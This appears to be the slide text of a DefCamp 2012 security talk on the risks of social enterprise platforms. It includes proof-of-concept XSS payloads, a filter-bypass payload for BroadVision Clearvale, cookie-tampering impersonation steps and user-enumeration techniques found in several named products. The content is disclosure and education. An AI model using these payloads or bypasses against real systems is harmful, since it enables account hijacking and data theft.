Social Enterprise Rises! …and so are the Risks - DefCamp 2012
1. Social Enterprise Software Rises!
…and so are the Risks
Marian Ventuneac
marian.ventuneac@gmail.com
@mventuneac
2. About myself
Security Architect
International presenter
Member of OWASP and ISACA global organizations
OWASP Ireland Limerick Chapter Leader
https://www.owasp.org/index.php/Ireland-Limerick
Security Researcher PhD, MEng
http://www.ventuneac.net
http://secureappdev.blogspot.com
http://dcsl.ul.ie
2
An Introduction to Web Application Security Risks
3. Agenda
Social Enterprise Software: What, Why, and How?
Social Enterprise Software & Risks
Thoughts on Calculated Risk
Social Enterprise Software & Risks (some case studies)
Final Thoughts
3
An Introduction to Web Application Security Risks
4. Social Enterprise Software: What?
Social Enterprise/Social Enterprise Networks/Social
Enterprise Software
Enterprise solutions providing Facebook-like social
networking functionality
‘social networking’ + ‘enterprise software’ =
‘social enterprise networking’
4
An Introduction to Web Application Security Risks
5. Social Enterprise Software: Why?
Improve communication an increase work efficiency
internal collaboration
establish teams, communities or informal groups
share knowledge and learn from other people experiences
social networking
external collaboration with partners
…
Used by employees and external customers, suppliers,
partners
5
An Introduction to Web Application Security Risks
6. Social Enterprise Software: Deployment models
On-premise solutions
Deployed inside the enterprise network, usually controlled and
managed by the client
Public Cloud-based solutions
Software as a Service (SaaS) - Hosted and administered by the
vendor
Hybrid deployments
Usually open to allow external collaboration
customers, suppliers, third-party contractors, etc
6
An Introduction to Web Application Security Risks
7. Social Enterprise Software: Some of the Risks
Potential loss of enterprise data
Understand what type of data needs to be uploaded there
Do you know/control what data is actually being shared?
Exploitation of common application vulnerabilities
Phishing attacks, social engineering
Viruses and malware
Cloud-based solutions – various compliance and security
concerns
Do you know where is your data stored?
7
An Introduction to Web Application Security Risks
8. Common Strategies for Risk Mitigation
Vendor/supplier due diligence
Security policies (generic/dedicated)
Security processes & procedures
Control the data being shared (data classification)
Verify identity of users accessing the data (authentication)
Control user access to data
Approve/Create/Lock user accounts (accounts management)
Remote wipe (for mobile devices – smartphone, tablets, etc)
…
8
An Introduction to Web Application Security Risks
10. Calculated Risks (cont)
Business requirement:
WE (the company) need social enterprise software X for Y and Z
reasons.
IT Security (most likely take on it):
Scenario 1: No, there is to much risk to take!
Scenario 2: Yes - We trust our partners and their choices.
Scenario 3: Yes - IF Business ASSUMES ALL THE RISKS…
Scenario 4: Let’s take a closer look at it…
Scenario 5: Yes - the vendor is big enough and we can trust it
(= the vendor takes application security seriously)
10
An Introduction to Web Application Security Risks
11. Let’s Take a Closer Look
Software defects leading to exploitation of security
vulnerabilities
OWASP Top 10 Security Risks
CVE/SANS Top 25 Programming Errors
Vendor size – a plus, but doesn‘t guarantee the chosen
solution is vulnerability free
It is safe to assume there is no application 100% secure
If anyone claims such a thing, can they provide
reasonable proof?
An Introduction to Web Application Security Risks
12. Let’s Take a Closer Look (cont)
Trust but verify
Reach an agreement to test the chosen solution in a suitable
environment (ideally prior of any contracts being signed)
Manual security testing
Automated security testing
Responsible disclosure
Most likely you will not be
disappointed
An Introduction to Web Application Security Risks
13. The Closer Look (cont)
A practical take on assessing security of social
enterprise software solutions
Some of the chosen ones
An Introduction to Web Application Security Risks
14. The Closer Look (cont)
Assessment criteria including tests for
Cross-Site Scripting (XSS)
Insecure Direct Object Reference
Security Missconfiguration
Failure to Restrict URL Access
Unvalidated Redirects and Forwards
Logical Flaws
…
An Introduction to Web Application Security Risks
15. Blogtronix Enterprise
Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
CVE-2011-1039 - Multiple XSS Vulnerabilities
Persistent (partially) XSS via Search functionality (auth. user)
HTTP request:
http://test_site/Home/pages/search/?search=
<script>alert(document.cookie)</script>
&sub=1&tab=0
HTTP response:
…
<a href="/Home/pages/search/?search=%3cscript
%3ealert(document.cookie)%3b&sub=1
&tab=0"> <script>alert(docume...</a>
</span> <span style=“
…
An Introduction to Web Application Security Risks
16. Blogtronix Enterprise (cont)
CVE-2011-1039 - Multiple XSS Vulnerabilities
Reflected XSS in login
page via arbitrary parameter
HTTP request:
https://test_site/pages/login/?a"'>
<script>alert(document.cookie)</script>
HTTP response:
<form method="post" action="/pages/login/?
a"'><script>alert(document.cookie)</script>"
id="aspnetForm">
Multiple Reflected XSS
via existing and arbitrary
parameters of existing
resources
An Introduction to Web Application Security Risks
17. Blogtronix Enterprise (cont)
Insecure Direct Object Reference (variant)
Valid user A can potentially impersonate another user B
Tamper value of userAccountID_http://test_site/ cookie (ASP.NET
GUID)
1. At login time - replace value of
userAccountID_ cookie with the
one matching user B
2. Do something noticeable
(post a message in group X)
& log out
3. As authenticated user A, review
user recent B’s activity – user B
appears as a recent visitor of group X
An Introduction to Web Application Security Risks
18. Blogtronix Enterprise (cont)
Security Missconfiguration
Enumerate valid user IDs
Unauthenticated attacker checks for
https://test_site/users/user_id
if user_id exists, redirected to login
if not, display custom error
Enumerate valid groups
Unauthenticated attacker checks for
https://test_site/group_id/pages/people/
if group_id exists, redirected to login
if not, display custom error
An Introduction to Web Application Security Risks
20. Blogtronix Enterprise (cont)
CVE-2011-1040 Unvalidated Redirects
https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f
Once the user logs in, he/she gets redirected to the resource
previously stated via ReturnUrl parameter
CVE-2011-1041 Failure to restrict access to protected
resources
Attacker knows hashed user ID
and name of uploaded file =>
file can be accessed without auth.
Attacker knows hashed user ID
=> user profile picture can be
accessed without auth.
An Introduction to Web Application Security Risks
21. Salesforce Chatter SaaS
Multiple persistent XSS vulnerabilities
via user profile first &
last name
<a href="/005D00000022Ouw" class=
"entityLink" title="Adam"
onmouseover="alert(1)" Cole">
Adam" onmouseover="alert(1)&
quot; Cole</a>
via group name
<a href="/0F9D0000000PPwz" class=
"entityLink" title="test_group"
onmouseover="alert(3)"">test_group&
quot; onmouseover="alert(3)"</a>
An Introduction to Web Application Security Risks
22. Salesforce Chatter SaaS (cont)
Improper User Input Validation
File Sharing - CR LF symbols accepted into file title
(via SaaS solution) POST /mobile/direct/23.0/
005D0000001yD7B/feed_items.json HTTP/1.1
Host: eu1.salesforce.com
…
Content-Disposition: form-data; name="title”
arv_test52%0a%0d%0a
An Introduction to Web Application Security Risks
23. Salesforce Chatter Desktop
Improper Error Handling leading to Information Disclosure
submitting comments for inexistent posts
HTTP POST request: /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1
Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at
"DOPEY.CFEEDCOMMENT", line 149nORA-06512: at "DOPEY.CFEEDCOMMENT", line
253nORA-06512: at line 1n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}
attempting to ‘like’ and inexistent post
HTTP POST request: /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1
Error: {"status":404,"msg":"NoDataFoundException: ORA-20001: nORA-06512: at
"DOPEY.CFEEDLIKE", line 156nORA-06512: at "DOPEY.CFEEDLIKE", line 217nORA-06512: at
"DOPEY.CFEEDLIKE", line 118nORA-06512: at line 1n: {call
cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}
An Introduction to Web Application Security Risks
24. Yammer
Persistent XSS via group name
HTTP POST request:
/ventuneac.net/groups HTTP/1.1
Host: www.yammer.com
…
-----------------------------295562556131627
Content-Disposition: form-data; name="group[name]"
a4" onmouseover="alert(4)"
-----------------------------295562556131627
HTTP response (home page):
GET /ventuneac.net/ HTTP/1.1
Host: www.yammer.com
…
<a href="/ventuneac.net/groups/a4onmouseoveralert4"
class="nav-list-link" title="a4" onmouseover="alert(4)" group">
An Introduction to Web Application Security Risks
25. Jive
Persistent XSS via group name (create/edit)
HTTP POST request:
POST /create-group.jspa HTTP/1.1
Host: ventuneac.jiveon.com
…
-----------------------------215202979014924
Content-Disposition: form-data; name="description"
group2"><script>alert(1)</script>
-----------------------------215202979014924
HTTP response (load group from Places):
GET /groups/group2 HTTP/1.1
Host: ventuneac.jiveon.com
…
<meta name="description" content="group2">
<script>alert(1)</script>" />
An Introduction to Web Application Security Risks
26. BroadVision Clearvale SaaS
Multiple persistent XSS vulnerabilities
via user profile first &
last name & search page
<a href="http://vmarian.clearvale.com/pg/profile/3"
rel="me" . title="m"
style="xss:expr/*XSS*/ession(
document.location('http://www.google.co.uk'))">
m" style="xss:expr/*XS...</a>
via group name & search page
<a href="http://vmarian.clearvale.com/pg/groups/
23/aaaa-stylexssexprxssessiondocumentlocation
httpwwwgooglecouk/" title="aaa">
<a style="xss:expr/*XSS*/ession(
document.location('http://www.google.co.uk'))">
aaa"><a style="xss:exp...</a>
An Introduction to Web Application Security Risks
27. BroadVision Clearvale SaaS (cont)
The broken fix for user profile name XSS issue
Black-list user input validation
style followed by = becomes style00 (style=, style =, etc)
document.location followed by ( becomes document.location00
alert followed by ( becomes 00
/* becomes /0*
for first instance only
*/ becomes *0/
…
Improper output escaping
An Introduction to Web Application Security Risks
28. BroadVision Clearvale SaaS (cont)
The broken fix for user profile name XSS issue
Bypassing Clearvale XSS filter
XSS payload:
firstname: m” style
lastname: ="/**/;xss:expr/**/ession(alert/**/('aaa'))
HTTP response:
…
<a href="http://vmarian.clearvale.com/pg/profile/3"
rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/('aaa')) ">m" style
="/0**0/;xss:...</a>
An Introduction to Web Application Security Risks
29. Knowing What ‘private’ Really Means
Social Enterprise Software usually provides document
sharing/publishing functionality
Private (not shared with anyone – default option)
Shared with private (locked) groups/members
Shared with public groups
Shared with everyone (shared via public link)
In certain conditions, the private documents can
become… less private
An Introduction to Web Application Security Risks
30. AntiVirus & anti-malware file scanning
BroadVision Clearvale has a built-in AV scanning engine
The rest of tested solutions currently lack such capabilities
Yammer and Salesforce plan to add AV file scanning
No malicious files were used for testing AV capabilities
An Introduction to Web Application Security Risks
31. The Closer Look: Summary
Common security vulnerabilities - can be easily exploited
User shared information is not properly validated and
sanitised
A malicious user can inject JavaScript malware into his/her
profile/groups/actions/etc
Where such user controlled data is seen/accessed by other
users, their accounts can easily get compromised
Exploitation of such vulnerabilities could severely
compromise security of enterprise data
An Introduction to Web Application Security Risks
32. Final Thoughts
Even if the vendor is a market leader, it doesn’t
necessarily mean they get application security right
Dare to ask for proofs of application security
Trust but verify
Vendor due diligence, social enterprise software related
security policies & security procedures, etc
Interested on this kind of benchmarks?
OWASP Security Baseline Project
https://www.owasp.org/index.php/OWASP_Security_Baseline_Project
An Introduction to Web Application Security Risks